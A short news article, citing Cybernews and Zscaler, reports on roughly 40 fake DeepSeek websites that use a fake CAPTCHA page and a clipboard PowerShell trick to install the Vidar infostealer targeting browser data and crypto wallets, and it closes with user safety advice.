According to Cybernews, nearly 40 websites impersonating the Chinese AI platform DeepSeek have been created to spread the Vidar malware and target cryptocurrency wallets.
Security firm Zscaler has revealed that cybercriminals are tricking victims into visiting websites allegedly linked to DeepSeek. After registering, users are redirected to a fake CAPTCHA page, which allows the Vidar malware to be downloaded. This advanced trojan steals sensitive files and data stored in more than a dozen browsers, including Google Chrome, Mozilla Firefox, Microsoft Edge, and Opera GX. Hackers are also targeting various cryptocurrency extensions such as Coinbase and MetaMask.
Cybercriminals Are Impersonating DeepSeek
These malicious sites not only distribute malware but are also used to carry out “pump-and-dump” schemes in the cryptocurrency market, gift card fraud, and fake gambling services.
With DeepSeek gaining popularity, cybercriminals are taking advantage of the hype to seize users’ digital wallets. Numerous fake domains impersonating this Chinese AI platform have been discovered, posing a serious threat to unsuspecting users. These fraudulent DeepSeek websites are designed to steal login credentials, capture cookies, and exfiltrate user files and information.
According to Zscaler, around 40 such domains have been identified, helping spread the Vidar malware. This malware attacks up to 80 cryptocurrency-related extensions, including MetaMask, Coinbase, Binance, and Trust Wallet, while also exploiting data stored in web browsers.
How Do Cybercriminals Steal Login Data?
The attack starts by luring victims to a fake website impersonating DeepSeek. After signing up, users are redirected to a CAPTCHA verification page. Typically, CAPTCHA is used as a security measure to distinguish humans from bots. However, in this case, hackers use it to deliver malicious code to the victim’s device.
Once a user clicks the „I am not a robot” checkbox, JavaScript on the page automatically copies a PowerShell command to the clipboard. Fake verification instructions then trick users into manually executing this command in the Windows „Run” dialog. If executed, the Vidar malware is downloaded and launched, initiating the process of identifying and stealing sensitive files and personal data.
Vidar also hides its communication with command-and-control (C2) servers using legitimate platforms such as Telegram and Steam, making it harder to detect and eliminate.
By exploiting DeepSeek’s reputation, attackers successfully infect users’ devices and take control of their digital assets. To stay safe, users should be cautious when visiting AI-related websites and always verify URLs before registering or providing personal information.
Thank you for reading our article to the end.
